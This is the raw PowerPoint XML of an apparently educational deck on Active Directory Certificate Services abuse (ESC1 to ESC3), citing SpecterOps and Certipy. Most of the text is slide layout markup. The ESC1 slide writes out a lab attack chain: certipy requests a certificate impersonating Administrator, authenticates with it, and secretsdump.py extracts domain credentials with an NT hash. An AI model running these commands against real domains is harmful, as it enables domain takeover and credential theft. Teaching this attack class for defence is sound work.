          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1840030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AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24255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652" y="1447800"/>
            <a:ext cx="3400178" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2399"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83370" y="1447800"/>
            <a:ext cx="5194644" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1999"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1799"/>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154653" y="3129281"/>
            <a:ext cx="3400177" cy="2895599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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s-ES" smtClean="0"/>
              <a:t>Editar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1121748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606" y="1854192"/>
            <a:ext cx="5091580" cy="1574808"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3599"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947736" y="1143000"/>
            <a:ext cx="3199567"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54654" y="3657600"/>
            <a:ext cx="5083655" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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9AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-U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25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352975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6"/>
            <a:ext cx="4035961"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8"/>
            <a:ext cx="1522016" cy="2365453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8606770" y="1676400"/>
            <a:ext cx="2818666"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7330" y="1"/>
            <a:ext cx="1602969"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3637" y="6096000"/>
            <a:ext cx="993475" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>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5943" y="452718"/>
            <a:ext cx="9402274" cy="1400530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:no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03025" y="2052919"/>
            <a:ext cx="8944211" cy="4195481"/>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rot="5400000">
            <a:off x="10152866" y="1790741"/>
            <a:ext cx="990599" cy="304720"/>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AFE8FB1-0A7A-443E-AAF7-31D4FA1AA312}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/9/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8948740" y="3225337"/>
            <a:ext cx="3859795" cy="304722"/>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49844" y="295730"/>
            <a:ext cx="837981" cy="767687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2799" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2940694241"/>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457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="419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797" indent="-342797" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="bg2">
            <a:lumMod val="40000"/>
            <a:lumOff val="60000"/>
          </a:schemeClr>
        </a:buClr>
        <a:buSzPct val="80000"/>
        <a:buFont typeface="Wingdings 3" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="1999" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742727" indent="-285664" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="bg2">
            <a:lumMod val="40000"/>
            <a:lumOff val="60000"/>
          </a:schemeClr>
        </a:buClr>
        <a:buSzPct val="80000"/>
        <a:buFont typeface="Wingdings 3" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="1799" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1142657"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599720"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6783"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5248"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0908"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7971"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5034"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063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1799" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="457063" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1799" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="914126" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1799" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1371189" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1799" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1828251" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1799" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2285314" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1799" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2742377" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1799" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3199440" algn="l" defTabSz="457063" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1799" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3656503" algn="l" defTabSz="457063"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mailto:Administrator@EVILDC1.evilcorp.loca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Active%20Directory%20Certificate%20Abuse.pptxhttps:/docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786426(v=ws.11)"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www.tarlogic.com/blog/ad-cs-esc7-attack/"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speakerdeck.com/heirhabarov/hunting-for-active-directory-certificate-services-abuse"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www.tarlogic.com/blog/ad-cs-manageca-rce/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/certified-pre-owned-d95910965cd2" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sysadmins.lv/blog-en/constraining-extended-key-usages-in-microsoft-windows.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/heirhabarov/hunting-for-active-directory-certificate-services-abuse" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/Certify" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ly4k/Certipy" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tarlogic.com/blog/ad-cs-esc7-attack/"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speakerdeck.com/heirhabarov/hunting-for-active-directory-certificate-services-abus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hyperlink" Target="https://posts.specterops.io/certified-pre-owned-d95910965cd2"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57908" y="1484784"/>
            <a:ext cx="9144000" cy="2667000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory Certificate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Abuse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng"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b="1" dirty="0" smtClean="0"/>
              <a:t>ESC1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> - Abuse</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477788" y="2060848"/>
            <a:ext cx="11377264" cy="4111352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> 'EVILCORP/TheHorseman:EvilCorp3.@EVILDC1.EvilCorp.local' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> 'EvilCorp-EVILDC1-CA' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> 'Vulnerable ECS1' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>alt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Administrator@EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>administrator.pfx</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>secretsdump.py -hashes :669556eda1adbb10afdf29f42760db39 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Administrator@EVILDC1.evilcorp.local</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2453885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65820" y="332656"/>
            <a:ext cx="9143998" cy="1630362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" smtClean="0"/>
              <a:t>ESC2 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Certificate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>template can be used for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>purpose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405780" y="2276872"/>
            <a:ext cx="7200800" cy="4764360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Enterprise CA grants low-privileged users enrollment rights. Details are the same as</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESC1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Manager </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>approval is disabled. Details are the same as in ESC1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No authorized signatures are required. Details are the same as in ESC1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An overly permissive certificate template security descriptor grants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>certificate enrollment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rights to low-privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>users. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>certificate template defines the Any Purpose EKU or no EKU.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7966620" y="2348880"/>
            <a:ext cx="3168352" cy="3168352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3024211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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" smtClean="0"/>
              <a:t>ESC3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Misconfigured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>Enrollment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
